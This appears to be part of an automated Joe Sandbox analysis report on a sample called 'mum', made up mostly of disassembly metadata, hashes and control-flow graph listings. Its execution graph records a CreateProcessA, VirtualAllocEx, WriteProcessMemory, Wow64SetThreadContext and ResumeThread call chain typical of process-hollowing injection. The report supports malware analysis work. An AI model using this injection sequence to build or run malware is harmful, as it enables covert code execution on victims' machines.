                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E7A8B
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: ca19b3865f0c9a0436f4c6695af1c38d66d62827b33519bf91f39f687de27037
                                      • Instruction ID: 34a32965ef6626444bb975dd7089ced3aca06f4013976bf1d2850fab3e983692
                                      • Opcode Fuzzy Hash: ca19b3865f0c9a0436f4c6695af1c38d66d62827b33519bf91f39f687de27037
                                      • Instruction Fuzzy Hash: A7C1D174E04218CFDB14DFA5C994B9DBBB2BF89304F2090AAD409AB359DB359E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1459 2e56d8-2e56f8 1460 2e56ff-2e57c2 KiUserExceptionDispatcher 1459->1460 1461 2e56fa 1459->1461 1467 2e5ada-2e5b0c 1460->1467 1468 2e57c8-2e57df 1460->1468 1461->1460 1471 2e57e6-2e57ef 1468->1471 1472 2e57e1 1468->1472 1473 2e5acd-2e5ad3 1471->1473 1472->1471 1474 2e5ad9 1473->1474 1475 2e57f4-2e586a 1473->1475 1474->1467 1480 2e5926-2e5980 1475->1480 1481 2e5870-2e58de 1475->1481 1492 2e5981-2e59cf 1480->1492 1490 2e58e0-2e5920 1481->1490 1491 2e5921-2e5924 1481->1491 1490->1491 1491->1492 1497 2e5ab8-2e5ac3 1492->1497 1498 2e59d5-2e5ab7 1492->1498 1500 2e5aca 1497->1500 1501 2e5ac5 1497->1501 1498->1497 1500->1473 1501->1500
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E57A3
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 675bad392f8a96181c1b3de3049740ded38c54a07a9eef96c0f9055b17e9ebaf
                                      • Instruction ID: 27d23eac9b5440f54e7cadeb87e28fd8d87d593312ebabd161e4ba39b1965a86
                                      • Opcode Fuzzy Hash: 675bad392f8a96181c1b3de3049740ded38c54a07a9eef96c0f9055b17e9ebaf
                                      • Instruction Fuzzy Hash: 13C1D074E10218CFDB14DFA5C994B9DBBB2BF89304F2080AAD409AB359DB359E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E0113
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: e9af03a5a673eb98499ca3c916ee564328f2fe4c02b0c00467449599cf2846b2
                                      • Instruction ID: 75c7816fb04a51548f7db7181e34139d42e0e2144be5174e9895bb8c20f6569d
                                      • Opcode Fuzzy Hash: e9af03a5a673eb98499ca3c916ee564328f2fe4c02b0c00467449599cf2846b2
                                      • Instruction Fuzzy Hash: CA4149B0E04248CFEB04CFAAD8517DEBBF2AF99300F64C06AC414AB266DB344946CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E5BFB
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: b39450432916ace0e24e834d8ad885ef80cf90faacf774ab329e0b1467b024b5
                                      • Instruction ID: 564690396acd0b32cc5e04e2705429311f3d9b4121da2d7072fcfc115d08b22e
                                      • Opcode Fuzzy Hash: b39450432916ace0e24e834d8ad885ef80cf90faacf774ab329e0b1467b024b5
                                      • Instruction Fuzzy Hash: 2B410470E11648CFEB18DFAAC4416DEBBB2AF99304F64D12AD414BB269DB344946CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E6903
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 8117d43ed359aafc5411d90777f1b67ce2e61fad2698c1a936ed3123c180f8aa
                                      • Instruction ID: 5000355d841adcdbb581d5d959b675a47b4f4bb7be0158e931066d900218a518
                                      • Opcode Fuzzy Hash: 8117d43ed359aafc5411d90777f1b67ce2e61fad2698c1a936ed3123c180f8aa
                                      • Instruction Fuzzy Hash: 08412570E00248CFDB18DFAAC9556EEBBF2AF98304F24D12AD414BB269DB344946CF54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E833B
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 8cf8f5ad9c9be944420b8737c5b50b4f6fcee74cc1bce2db79f06c26c195fc88
                                      • Instruction ID: 97abc3424e1e62d2e367da8f4cc0278a7d88f318c2c76166bf5fc7674e6caf60
                                      • Opcode Fuzzy Hash: 8cf8f5ad9c9be944420b8737c5b50b4f6fcee74cc1bce2db79f06c26c195fc88
                                      • Instruction Fuzzy Hash: F541E570E00248CFDB18DFAAC9946DEBBF2AF99304F24D12AD418AB365DB354946CF40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E6053
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 067aa53c783c337ed970c91ef3393853caee30a98467010690474e658aad9ef1
                                      • Instruction ID: 6f2286b34b1d5520d78f136c62567d1bbfa7076151093dfdceba29627dc38e1e
                                      • Opcode Fuzzy Hash: 067aa53c783c337ed970c91ef3393853caee30a98467010690474e658aad9ef1
                                      • Instruction Fuzzy Hash: FC410374E002488FEB18DFAAC9456EEBBF2AF98304F24C12AD414BB369DB345945CF40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E7633
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 8d120f057dd151377fdd58286c086d4f123ba61b8ce965e7d48e8541e2df14f4
                                      • Instruction ID: e789ee5694538995eaa8f456db774e50bd97f052c24da3e12cd049fcf5173636
                                      • Opcode Fuzzy Hash: 8d120f057dd151377fdd58286c086d4f123ba61b8ce965e7d48e8541e2df14f4
                                      • Instruction Fuzzy Hash: CD41F670D04248CBDB18DFAAC8556DEBBF2AF89304F24C16AD414BB259DB344946CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E7A8B
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 9bb8a655e3553f89988602b1c22ba879af148b47970f87b28184ecace551c074
                                      • Instruction ID: 3546a40ec8e9fc46b67e57b1834c9bc2c36dcd31d3ac8a3540edd4ba45b6985e
                                      • Opcode Fuzzy Hash: 9bb8a655e3553f89988602b1c22ba879af148b47970f87b28184ecace551c074
                                      • Instruction Fuzzy Hash: 0141F270E04248CFDB18DFAAC9546EEBBF2AF89304F24C12AD419AB369DB345945CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E64AB
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: d99172b965f589fa2429ca06ea38c61930dc9afbea6333f1c87c81f19d340f2e
                                      • Instruction ID: 573a80595901283cb143a40f81c4a16f66880dce59fbba4f07d58f5d68627c87
                                      • Opcode Fuzzy Hash: d99172b965f589fa2429ca06ea38c61930dc9afbea6333f1c87c81f19d340f2e
                                      • Instruction Fuzzy Hash: 0741E270E002488BEB18DFAAC8556EEFBF2AF99304F24D12AD414AB269DB344945CF40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E8793
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 9d12cfd906a096530d98f5e7ac65501accd4e4be7931eb67a34663a07cfe47ea
                                      • Instruction ID: c171327b88f2f8a272e3e01274d87458f61b6fff4ce9a013cd816f291d4c1ff5
                                      • Opcode Fuzzy Hash: 9d12cfd906a096530d98f5e7ac65501accd4e4be7931eb67a34663a07cfe47ea
                                      • Instruction Fuzzy Hash: 8F41D275E04248CBDB18DFAAC9516EEBBF2AF89304F64C12AD418BB265EB344945CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E6D5B
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 0b4d08f8fd9e60efbb5cc65ff1a7899100b3ec28c88f3def20a953da359551c8
                                      • Instruction ID: 6b6ad6e922575fc2c78541343921b524e6984ca774f720df4f61b072fc0c7f3c
                                      • Opcode Fuzzy Hash: 0b4d08f8fd9e60efbb5cc65ff1a7899100b3ec28c88f3def20a953da359551c8
                                      • Instruction Fuzzy Hash: 49410270E042488BEB18DFAAC8456DEFBB2AF98300F60C12AD414BB269DB344945CF40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E09C3
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: fd272c2c048d8e471a0e5654baa2b97ac49f70dc4df03a09d2e1aeafa8289349
                                      • Instruction ID: 7b3e9c08b7ebfac791ed853037e8261c4e60ef1ddc41e3aa63022eff40925e8d
                                      • Opcode Fuzzy Hash: fd272c2c048d8e471a0e5654baa2b97ac49f70dc4df03a09d2e1aeafa8289349
                                      • Instruction Fuzzy Hash: AC411370E052488FDB18CFAAC9946DEBBF2AF99300F24D12AD415BB369DB744946CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E7EE3
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: b665be2fb2fbff9606d63e3c9ecbd2769a885d2a6a4f7ae4db594befa526c787
                                      • Instruction ID: 4e97eb13ed0583c6a3e8eeab04181146ffa1ef6d41b9ffd8bdb24c6c048634ba
                                      • Opcode Fuzzy Hash: b665be2fb2fbff9606d63e3c9ecbd2769a885d2a6a4f7ae4db594befa526c787
                                      • Instruction Fuzzy Hash: 56410570E04248CBDB18DFAAC8506EEBBF2AF89304F24C12AD418BB259DB354946CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E71DC
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: c1dd7959d69914a5c7a864b357d4a32f540a019e6578d8bb9cc60583bbc29b30
                                      • Instruction ID: 382f86b1a2d429e0c1c40f8faeb7555fffea01b311d58049d7ff5f56466dd185
                                      • Opcode Fuzzy Hash: c1dd7959d69914a5c7a864b357d4a32f540a019e6578d8bb9cc60583bbc29b30
                                      • Instruction Fuzzy Hash: C5411270E05248CFDB18DFAAC9406AEBBF2AF89300F64D12AD418AB269DB344945CF40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E056B
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 2e15bdbb516e8899ce47dac4e295c064754056bd87655d01033eb2183d3c7cba
                                      • Instruction ID: 8496f182c5a8d110995218c507d1a8ae82d8f9714e3b7b9a1e1d6f026a0c81fe
                                      • Opcode Fuzzy Hash: 2e15bdbb516e8899ce47dac4e295c064754056bd87655d01033eb2183d3c7cba
                                      • Instruction Fuzzy Hash: 30410570E01248CFDB18DFAAC9946DEBBF2AF89304F64C12AD414BB269DB344946CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E8BEB
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 497a60d40e425275119979764af16ace1e692216fcfe509dd98f9c9d4986ba84
                                      • Instruction ID: 5cb7da5a9f282764840a2acfad89df5dae37ee3bd67237012b587a2aaeeca98c
                                      • Opcode Fuzzy Hash: 497a60d40e425275119979764af16ace1e692216fcfe509dd98f9c9d4986ba84
                                      • Instruction Fuzzy Hash: E5410570E00248CBDB18DFAAC88069EBBB2AF89304F64D12AD418BB765EB344945CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E1B23
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 8d8f959b28c85cf2019eb47de7177ea8d1eb79131f642b64b07718bbdaa6a4b5
                                      • Instruction ID: f528c76ec139ee75988406bfda270512d125a341df814bf733cefd92ae8cfedd
                                      • Opcode Fuzzy Hash: 8d8f959b28c85cf2019eb47de7177ea8d1eb79131f642b64b07718bbdaa6a4b5
                                      • Instruction Fuzzy Hash: C841D670E00248CBEB18DFAAC5516DEBBF2AF98304F64C12AD414BB365DB345A56CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E1273
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 98777e82ffcd9e724b0e9650a0a7f4ac785fbc86f095d63ffacc2e9b73d73993
                                      • Instruction ID: 298f01ca686ece936db3355dc1d86db90919ec14044c890ddc8ea3b2dc7c0e72
                                      • Opcode Fuzzy Hash: 98777e82ffcd9e724b0e9650a0a7f4ac785fbc86f095d63ffacc2e9b73d73993
                                      • Instruction Fuzzy Hash: A041D270E00248CBEB18DFAAC9556DEBBF2AF99300F64C12AD515BB269DB344946CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E9043
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: c4ab333fd8753ec9e28ac80f5e1d3241faad55e4ee5458a3058440a410efeafa
                                      • Instruction ID: c9ffbd4a4b8496361c5516cf4cee2718fc3fb15319f237561d15b11348805600
                                      • Opcode Fuzzy Hash: c4ab333fd8753ec9e28ac80f5e1d3241faad55e4ee5458a3058440a410efeafa
                                      • Instruction Fuzzy Hash: 4141E270E00248CBEB18DFEAC9546DEBBF2AF89304F64C12AD419BB269DB354945CF44
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E0E1B
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: bb9786893589f08d40959d2d532989fddb9b7d0b18744ad8844d5f44d51ffa18
                                      • Instruction ID: 360cdca612ac91e402ecaebcc798f7209c675b8bc986e11a0f7977e193dedfca
                                      • Opcode Fuzzy Hash: bb9786893589f08d40959d2d532989fddb9b7d0b18744ad8844d5f44d51ffa18
                                      • Instruction Fuzzy Hash: 4C410270E05248CBDB18DFEAC9406AEBBF2AF88300F24C02AD419BB369DB344945CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E16CB
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 0639c5b980d3ba7d162f1b318fbc7d32905ff89640457aecb7933761a2e91533
                                      • Instruction ID: 503da7f458b6af72011e6ec8ed64bcf023a670dd92f489ddeeee737191783381
                                      • Opcode Fuzzy Hash: 0639c5b980d3ba7d162f1b318fbc7d32905ff89640457aecb7933761a2e91533
                                      • Instruction Fuzzy Hash: 5041D270E00248CBEB18DFAAC9506EEBBF2AF99304F64D12AD414BB369DB344955CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL(000000FF), ref: 001CBD5A
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1275842790.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_1c0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 66bd7df0e6fb57d77ce53dfca433415c29b1ae87f897c0c5d06a13e3cd94f252
                                      • Instruction ID: afe3e1b42b00ae59f5d4a537e8ffede5b4e53994945397c2f5848d237ee8bd70
                                      • Opcode Fuzzy Hash: 66bd7df0e6fb57d77ce53dfca433415c29b1ae87f897c0c5d06a13e3cd94f252
                                      • Instruction Fuzzy Hash: 6C5112B0D04208CBDB18CFEAD884BDDBBB2BF98314F24C529E415AB294D7748845CF14
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1275842790.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_1c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 47cb7db0106c86e1ff8f207b11390fd9712481ac62cacc496978e42f6921fdbc
                                      • Instruction ID: 898ac8889ea4385e8ef49251da093043072f1e9e834e0fd79a16d76003188185
                                      • Opcode Fuzzy Hash: 47cb7db0106c86e1ff8f207b11390fd9712481ac62cacc496978e42f6921fdbc
                                      • Instruction Fuzzy Hash: 88510DB4D08208CFCB18CFE9D485AECBBB1BF59328F209529E016AB294D7749885CF14
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1275517770.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_16d000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 10a074b00f2b69e125673f79e1060705dadabd725b01ff2a2f6a76b9003f5cd5
                                      • Instruction ID: 5f107cfa393ffd2fc021bbebf46ba1526070abcfd5832f2a513db4b2fb3e05a4
                                      • Opcode Fuzzy Hash: 10a074b00f2b69e125673f79e1060705dadabd725b01ff2a2f6a76b9003f5cd5
                                      • Instruction Fuzzy Hash: 4321F275B04244DFCB14DF14E884B26BB65EB88318F34C5A9E9094B246C33BD867CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1275517770.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_16d000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f440d2235312a3b7560020ffe15f85f923f3fbd722d6160c740e761f3ddd5792
                                      • Instruction ID: 52bb3cd601865ccf293042d3a07cda1dba5d8dcf1475fe59e0d4d1d5804cb582
                                      • Opcode Fuzzy Hash: f440d2235312a3b7560020ffe15f85f923f3fbd722d6160c740e761f3ddd5792
                                      • Instruction Fuzzy Hash: DF216D755093C08FCB12CF24D994B15BF71EB46314F28C5EAD8498B6A7C33AD81ACB62
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Execution Graph

                                      Execution Coverage:13.5%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:26
                                      Total number of Limit Nodes:0
                                      execution_graph 9663 51293c0 9664 51293d5 9663->9664 9668 ec6af9 9664->9668 9672 ec6b00 9664->9672 9665 51293eb 9669 ec6b49 Wow64SetThreadContext 9668->9669 9671 ec6bc7 9669->9671 9671->9665 9673 ec6b49 Wow64SetThreadContext 9672->9673 9675 ec6bc7 9673->9675 9675->9665 9680 5129330 9681 5129345 9680->9681 9684 ec6cf0 9681->9684 9685 ec6d34 VirtualAllocEx 9684->9685 9687 ec6db2 9685->9687 9688 ec6e48 9689 ec6e94 WriteProcessMemory 9688->9689 9691 ec6f33 9689->9691 9692 ec6fd8 9693 ec7024 ReadProcessMemory 9692->9693 9695 ec70a2 9693->9695 9659 ec69e0 9660 ec6a24 ResumeThread 9659->9660 9662 ec6a76 9660->9662 9676 ec7270 9677 ec72f7 CreateProcessA 9676->9677 9679 ec7555 9677->9679

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 2c2840-2c284e 1 2c28ae-2c28f6 call 2c1590 0->1 2 2c2850-2c2863 0->2 15 2c28f8-2c2900 1->15 16 2c292b-2c2945 1->16 5 2c2866-2c287a 2->5 9 2c287c-2c2882 5->9 10 2c2884-2c2887 5->10 9->5 9->10 12 2c2889-2c28a4 10->12 13 2c28a6-2c28ad 10->13 12->13 15->16 18 2c2902-2c290f 15->18 23 2c2947-2c2951 16->23 24 2c2952-2c29f1 16->24 18->16 19 2c2911-2c291e 18->19 19->16 22 2c2920-2c292a 19->22 23->24 40 2c29f8-2c2a1a 24->40 41 2c2a21-2c2e52 call 2c07f8 * 10 40->41 109 2c2e58-2c2e5d 41->109 132 2c2e62 call 2c2f60 109->132 133 2c2e62 call 2c3100 109->133 110 2c2e68-2c2e95 113 2c2e9c-2c2ea6 110->113 114 2c2eac-2c2f43 call 2c07f8 * 2 113->114 130 2c2f48-2c2f4a 114->130 131 2c2f51-2c2f58 130->131 132->110 133->110
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: +$+$=
                                      • API String ID: 0-3271284183
                                      • Opcode ID: 5df1df2d61d079c9339386431863546cf5683790553f5d77df7f30630c0ae89c
                                      • Instruction ID: 5f97f7326c045fd543cd07ba39bd1fecdd85d555c40737fc6ad168d96259295f
                                      • Opcode Fuzzy Hash: 5df1df2d61d079c9339386431863546cf5683790553f5d77df7f30630c0ae89c
                                      • Instruction Fuzzy Hash: E0227E306106148FCB54DF78C491B9EB7A2AF8A304F1585BDD80A9F36ADF359C45CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
